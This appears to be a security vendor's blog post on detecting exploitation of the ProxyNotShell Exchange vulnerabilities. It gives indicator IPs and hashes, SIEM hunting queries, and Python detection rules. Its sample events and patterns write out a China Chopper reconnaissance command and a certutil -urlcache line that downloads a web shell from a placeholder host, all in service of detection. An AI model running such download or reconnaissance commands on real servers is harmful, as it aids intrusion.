by Bhabesh Raj Rai, Security Research

On September 29, 2022, Microsoft confirmed reports of adversaries exploiting two zero-day vulnerabilities that affect Microsoft Exchange servers: CVE-2022-41040 (CVSSv3 score of 6.3) and CVE-2022-41082 (CVSSv3 score of 8.8). The former is a Server-Side Request Forgery (SSRF) vulnerability; the latter allows remote code execution (RCE) when PowerShell is accessible to the adversary. Exploiting either vulnerability requires authenticated access to the Exchange server.

Vietnamese security company GTSC discovered in-the-wild exploitation of these flaws in August and published a blog with more details on September 28. A day later, Microsoft gave customers detection and mitigation guidance for the threat. Both Microsoft and GTSC observed adversaries using the attack chain to install the popular China Chopper web shell.

The vulnerabilities are very similar to the ProxyShell vulnerabilities disclosed in 2021. Security researcher Kevin Beaumont nicknamed them ProxyNotShell because of that similarity; the main difference is that ProxyNotShell requires authentication.

ProxyNotShell fast facts

  • Requires authenticated access to the Exchange server
  • Only affects on-premises Exchange servers (2013/2016/2019)
  • No patch is available at the moment
  • Adversaries are chaining the two zero-days to drop web shells
  • Microsoft observed attacks in fewer than 10 organizations globally

Detect exploitation of ProxyNotShell using Logpoint

Perform IoC sweeps for ProxyNotShell using logs from August onward. Run the network sweep and the hash sweep as two separate queries, and note that the two address fields (and the two hash fields) are joined with OR: an event should match when either endpoint, or either hash field, carries an indicator, since a beacon to an attacker IP has an internal source and an indicator destination.

(source_address IN [137.184.67.33, 125.212.220.48, 5.180.61.17, 47.242.39.92, 61.244.94.85, 86.48.6.69, 86.48.12.64, 94.140.8.48, 94.140.8.113, 103.9.76.208, 103.9.76.211, 104.244.79.6, 112.118.48.186, 122.155.174.188, 125.212.241.134, 185.220.101.182, 194.150.167.88, 212.119.34.11, 206.188.196.77]
OR destination_address IN [137.184.67.33, 125.212.220.48, 5.180.61.17, 47.242.39.92, 61.244.94.85, 86.48.6.69, 86.48.12.64, 94.140.8.48, 94.140.8.113, 103.9.76.208, 103.9.76.211, 104.244.79.6, 112.118.48.186, 122.155.174.188, 125.212.241.134, 185.220.101.182, 194.150.167.88, 212.119.34.11, 206.188.196.77])

(hash IN [c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1, 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5, b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca, be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257, 074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82, 45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9, 9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0, 29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3, c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2, 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e]
OR hash_sha256 IN [c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1, 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5, b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca, be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257, 074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82, 45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9, 9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0, 29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3, c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2, 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e])
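The same sweep expressed as runnable logic, added here as an example; it is not Logpoint code or the Logpoint query language. The indicator IPs and hashes are the ones listed above, the field names mirror the queries, and the sample events, the August-onward cut-off and the lower-casing of hashes are my assumptions. It also shows why the address and hash conditions must be OR-joined: one endpoint of a beacon is always an internal host.

```python
"""IoC sweep for the ProxyNotShell indicators on this page, run over constructed
sample events. Added example; field names mirror the Logpoint queries above."""

# Indicator IPs and SHA-256 hashes copied from the sweep queries above.
IOC_IPS = {
    "137.184.67.33", "125.212.220.48", "5.180.61.17", "47.242.39.92",
    "61.244.94.85", "86.48.6.69", "86.48.12.64", "94.140.8.48",
    "94.140.8.113", "103.9.76.208", "103.9.76.211", "104.244.79.6",
    "112.118.48.186", "122.155.174.188", "125.212.241.134",
    "185.220.101.182", "194.150.167.88", "212.119.34.11", "206.188.196.77",
}
IOC_SHA256 = {
    "c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1",
    "65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5",
    "b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca",
    "be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257",
    "074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82",
    "45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9",
    "9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0",
    "29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3",
    "c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2",
    "76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e",
}
IP_FIELDS = ("source_address", "destination_address")
HASH_FIELDS = ("hash", "hash_sha256")


def ioc_ip_match(event):
    """True if EITHER endpoint is an indicator. Joining the two fields with AND
    would miss the normal case: an internal host talking to one attacker IP."""
    return any(event.get(f) in IOC_IPS for f in IP_FIELDS)


def ioc_hash_match(event):
    """True if either hash field holds an indicator. Hashes are lower-cased
    first because some log sources emit uppercase hex (assumption: the
    indicator list is lowercase, as it is on this page)."""
    return any((event.get(f) or "").lower() in IOC_SHA256 for f in HASH_FIELDS)


def sweep(events, since="2022-08-01T00:00:00Z"):
    """Return (reason, event) pairs for events at or after `since` (ISO-8601
    UTC strings compare correctly as text) that touch an indicator."""
    hits = []
    for ev in events:
        if since and ev.get("log_ts", "") < since:
            continue  # the page advises sweeping logs from August onward
        if ioc_ip_match(ev):
            hits.append(("ioc_ip", ev))
        if ioc_hash_match(ev):
            hits.append(("ioc_hash", ev))
    return hits


# Constructed sample events (not real telemetry); 10.0.5.0/24 is a pretend LAN.
SAMPLE_EVENTS = [
    {"log_ts": "2022-07-20T11:00:00Z", "source_address": "10.0.5.20",
     "destination_address": "5.180.61.17"},            # IoC, but before the window
    {"log_ts": "2022-08-14T03:11:02Z", "source_address": "10.0.5.20",
     "destination_address": "137.184.67.33"},          # outbound to an IoC
    {"log_ts": "2022-08-14T03:12:40Z", "source_address": "185.220.101.182",
     "destination_address": "10.0.5.20"},              # inbound from an IoC
    {"log_ts": "2022-08-14T03:15:09Z", "source_address": "10.0.5.21",
     "destination_address": "10.0.5.22"},              # benign internal traffic
    {"log_ts": "2022-08-14T03:20:55Z",                 # IoC hash, uppercase hex
     "hash_sha256": "C838E77AFE750D713E67FFEB4EC1B82EE9066CBE21F11181FD34429F70831EC1"},
    {"log_ts": "2022-08-14T03:21:10Z", "hash": "0" * 64},  # benign file
]

if __name__ == "__main__":
    for reason, ev in sweep(SAMPLE_EVENTS):
        print(reason, ev["log_ts"])
```

Passing `since=None` widens the sweep to all retained logs; the July event then surfaces too, which is worth doing once if retention allows, since GTSC's observations predate September.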

Since June 2021, Exchange has supported integration with the Antimalware Scan Interface (AMSI). We advise Exchange administrators to ensure all updates are installed and AMSI scanning is functional. Admins should also audit whether they have placed Exchange directories in antivirus exclusions for performance reasons; an excluded web root is exactly where a dropped web shell goes unscanned. Sweep antivirus telemetry for the Microsoft Defender detection names Microsoft associates with this activity:

label=Threat label=Detect 
threat IN ["Backdoor:ASP/Webshell.Y", "Backdoor:Win32/RewriteHttp.A", "Backdoor:JS/SimChocexShell.A!dha", "Behavior:Win32/IISExchgDropWebshell.A!dha", "Behavior:Win32/IISExchgDropWebshell.A", "Trojan:Win32/IISExchgSpawnCMD.A", "Trojan:Win32/WebShellTerminal.A", "Trojan:Win32/WebShellTerminal.B"]

Analysts should look for China Chopper web shell artifacts in process creation logs. Chopper runs its commands through the IIS worker process w3wp.exe, and the resulting command lines carry its characteristic echo markers:

label="Process" label=Create
parent_process="*\w3wp.exe" command IN ["*&ipconfig&echo*", "*&quser&echo*", "*&whoami&echo*", "*&c:&echo*", "*&cd&echo*", "*&dir&echo*", "*&echo [E]*", "*&echo [S]*"]

More broadly, we advise analysts to hunt for any unexpected child process of w3wp.exe. The query below excludes two children commonly seen on a healthy Exchange server (WerFault.exe and the C# compiler csc.exe) and summarizes the rest by user and command line:

label="Process" label=Create parent_process="*\w3wp.exe"
-process IN ["*\WerFault.exe", "*\csc.exe"]
| chart count() by log_ts, user, "process", parent_command, command

As stated in the GTSC report, attackers used certutil.exe to download web shells; its -urlcache switch is a well-known living-off-the-land download primitive:

label="Process" label=Create process="*\certutil.exe" 
command IN ["* -urlcache *", "* /urlcache *"]

Also hunt for file creations (Sysmon event ID 11) in C:\PerfLogs, C:\Users\Public and similar directories, which attackers commonly use to stage downloaded payloads:

norm_id=WindowsSysmon event_id=11
path IN ["C:\Users\Public*", "C:\PerfLogs*", "C:\root*"]
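The four hunts above (Chopper command artifacts, unexpected w3wp.exe children, certutil downloads, and file creations in staging directories) as one set of runnable rules, added here as an example; it is not Logpoint code and does not use the Logpoint query language. The patterns are the ones in the queries; the `*` wildcard is reimplemented with a regex so that the `[S]` and `[E]` markers are matched literally; the event schema, IDs, paths and the 198.51.100.7 address in the sample events are constructed.

```python
"""The hunting queries above as Python rules, run over constructed sample events.
Added example, not Logpoint code; field names follow the queries on this page."""
import re


def _like(value, patterns):
    """Case-insensitive match in which only '*' is a wildcard, like the queries.
    fnmatch is avoided on purpose: it would read the '[S]' in Chopper's markers
    as a character class and silently never match."""
    v = (value or "").lower()
    for p in patterns:
        rx = ".*".join(re.escape(part) for part in p.lower().split("*"))
        if re.fullmatch(rx, v, re.DOTALL):
            return True
    return False


# Patterns copied from the queries above.
W3WP = [r"*\w3wp.exe"]
CHOPPER_CMDS = ["*&ipconfig&echo*", "*&quser&echo*", "*&whoami&echo*", "*&c:&echo*",
                "*&cd&echo*", "*&dir&echo*", "*&echo [E]*", "*&echo [S]*"]
W3WP_BENIGN_CHILDREN = [r"*\WerFault.exe", r"*\csc.exe"]
CERTUTIL_DOWNLOAD = ["* -urlcache *", "* /urlcache *"]
STAGING_DIRS = [r"C:\Users\Public*", r"C:\PerfLogs*", r"C:\root*"]


def rule_chopper_artifact(ev):
    """Chopper wraps each command in echo markers; the IIS worker is the parent."""
    return (ev.get("event") == "process_create"
            and _like(ev.get("parent_process"), W3WP)
            and _like(ev.get("command"), CHOPPER_CMDS))


def rule_w3wp_child(ev):
    """Any child of w3wp.exe outside the short benign list: a hunt lead, not an alert."""
    return (ev.get("event") == "process_create"
            and _like(ev.get("parent_process"), W3WP)
            and not _like(ev.get("process"), W3WP_BENIGN_CHILDREN))


def rule_certutil_download(ev):
    """certutil -urlcache / /urlcache used as a downloader."""
    return (ev.get("event") == "process_create"
            and _like(ev.get("process"), [r"*\certutil.exe"])
            and _like(ev.get("command"), CERTUTIL_DOWNLOAD))


def rule_staging_dir_write(ev):
    """Sysmon event ID 11 (FileCreate) into directories used to park payloads."""
    return (ev.get("event") == "sysmon" and ev.get("event_id") == 11
            and _like(ev.get("path"), STAGING_DIRS))


RULES = {
    "chopper_artifact": rule_chopper_artifact,
    "w3wp_child": rule_w3wp_child,
    "certutil_download": rule_certutil_download,
    "staging_dir_write": rule_staging_dir_write,
}


def hunt(events):
    """Return (rule_name, event_id) for every rule each event trips."""
    return [(name, ev["id"]) for ev in events for name, rule in RULES.items() if rule(ev)]


W3WP_PATH = r"C:\Windows\System32\inetsrv\w3wp.exe"
# Constructed sample events, not real telemetry (198.51.100.7 is a TEST-NET address).
SAMPLE_EVENTS = [
    {"id": "e1", "event": "process_create", "parent_process": W3WP_PATH,
     "process": r"C:\Windows\System32\cmd.exe",
     "command": r'cmd /c cd /d "C:\inetpub\wwwroot\aspnet_client"&whoami&echo [S]&cd&echo [E]'},
    {"id": "e2", "event": "process_create", "parent_process": W3WP_PATH,
     "process": r"C:\Windows\System32\WerFault.exe", "command": "WerFault.exe -u -p 4312 -s 1820"},
    {"id": "e3", "event": "process_create", "parent_process": r"C:\Windows\System32\cmd.exe",
     "process": r"C:\Windows\System32\certutil.exe",
     "command": r"certutil.exe -urlcache -split -f http://198.51.100.7/x.txt C:\PerfLogs\x.aspx"},
    {"id": "e4", "event": "sysmon", "event_id": 11, "path": r"C:\PerfLogs\x.aspx"},
    {"id": "e5", "event": "sysmon", "event_id": 11,
     "path": r"C:\Program Files\Microsoft\Exchange Server\V15\Logging\HttpProxy\x.log"},
    {"id": "e6", "event": "process_create", "parent_process": W3WP_PATH,
     "process": r"C:\Windows\System32\cmd.exe", "command": "cmd /c echo hello"},
]

if __name__ == "__main__":
    for name, eid in hunt(SAMPLE_EVENTS):
        print(f"{name:20} {eid}")
```

Event e1 trips both the Chopper rule and the generic w3wp.exe-child rule, which is the intended layering: the generic rule catches tooling that does not use Chopper's markers (e6 here), at the cost of more triage.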

Detections for ProxyShell work for ProxyNotShell too, since the post-exploitation activity (web shells dropped and driven through w3wp.exe) looks the same. Customers can use the existing ProxyShell alerts bundled in the Logpoint Alert Rules application. As stated in Microsoft's blog, adversaries used the China Chopper web shell to perform Active Directory (AD) reconnaissance, and the Alert Rules application covers the necessary TTPs.

Apply mitigations without delay

We advise Exchange administrators to assess and apply the three mitigation options Microsoft provided in its customer guidance for ProxyNotShell as soon as possible. Microsoft also released a script that applies the URL Rewrite mitigation for the SSRF vector CVE-2022-41040 to affected Exchange servers. Mitigations reduce exposure but do not remove the vulnerable code, so treat them as a stopgap until a patch ships.

Analysts should monitor for exploitation attempts until Microsoft releases patches for ProxyNotShell. More generally, we advise analysts to hunt continually for web shells: detecting post-exploitation activity is often how zero-day and N-day exploitation gets uncovered in the first place, as it was here.

We will update the blog as the situation evolves.
